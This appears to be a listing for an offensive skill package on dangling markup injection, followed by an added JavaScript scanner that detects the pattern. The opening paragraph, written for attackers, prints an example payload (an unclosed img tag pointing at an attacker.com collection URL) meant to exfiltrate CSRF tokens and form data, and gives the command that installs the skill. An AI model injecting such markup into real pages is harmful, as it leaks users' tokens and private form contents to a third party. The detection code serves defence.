When CSP blocks your XSS or sanitizers strip event handlers, dangling markup lets you exfiltrate CSRF tokens and sensitive form data without executing JavaScript. You inject an unclosed HTML tag like `<img src="https://attacker.com/collect?` and let the browser consume everything after it until the next matching quote, turning hidden inputs and page content into URL parameters sent to your server. Chrome has mitigated some vectors since version 60, but form action hijacking and base tag poisoning still work across browsers. The skill covers seven exfiltration techniques, browser-specific quirks, and tactical combinations with CSRF and cache poisoning attacks. It's niche but essential when you hit that "HTML injection but no script execution" wall.

```bash
npx skills add https://github.com/yaklang/hack-skills --skill dangling-markup-injection
```
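
From the defender's side, the unclosed-tag injection described above has a recognisable shape in untrusted HTML: the fragment ends inside a tag or inside a quoted attribute value, or it carries a `<base>` tag or a form `action`. The following is an added example, not part of the skill or the original page; it is a simplified scanner rather than a full HTML5 tokenizer, and the function names, finding labels and sample inputs are assumptions made for illustration.

```javascript
// Added example: simplified scanner, not a full HTML5 tokenizer.
// Function names and finding labels are illustrative assumptions.
function checkTag(tag, findings) {
  // <base> rewrites how relative URLs on the rest of the page resolve.
  if (/^<base[\s\/>]/i.test(tag)) findings.push("base-tag");
  // action / formaction decide where enclosing form fields are submitted.
  if (/^<[a-z][^]*?[\s\/](?:form)?action\s*=/i.test(tag)) findings.push("form-action");
}

function findDanglingMarkup(fragment) {
  const findings = [];
  let state = "data"; // data | tag | dq | sq
  let tagStart = -1;
  let afterEq = false; // true right after "=", where a quote opens a value
  for (let i = 0; i < fragment.length; i++) {
    const c = fragment[i];
    if (state === "data") {
      if (c === "<" && /[A-Za-z\/!?]/.test(fragment[i + 1] || "")) {
        state = "tag"; tagStart = i; afterEq = false;
      }
    } else if (state === "tag") {
      if (c === ">") {
        checkTag(fragment.slice(tagStart, i + 1), findings);
        state = "data";
      } else if (c === "=") {
        afterEq = true;
      } else if ((c === '"' || c === "'") && afterEq) {
        state = c === '"' ? "dq" : "sq";
        afterEq = false;
      } else if (!/\s/.test(c)) {
        afterEq = false;
      }
    } else if ((state === "dq" && c === '"') || (state === "sq" && c === "'")) {
      state = "tag"; // quoted value closed, still inside the tag
    }
  }
  // Input that ends mid-quote or mid-tag would swallow the markup after it.
  if (state === "dq" || state === "sq") findings.push("unterminated-attribute-quote");
  else if (state === "tag") findings.push("unterminated-tag");
  return findings;
}

// Constructed sample inputs (collector.example is a placeholder host).
const samples = ['<b>hello</b>', '<img src="https://collector.example/c?', '<img src=x'];
for (const s of samples) console.log(JSON.stringify(s), "->", findDanglingMarkup(s));
```

A check like this complements, rather than replaces, re-serialising untrusted HTML through a real parser, which closes open tags and quotes by construction.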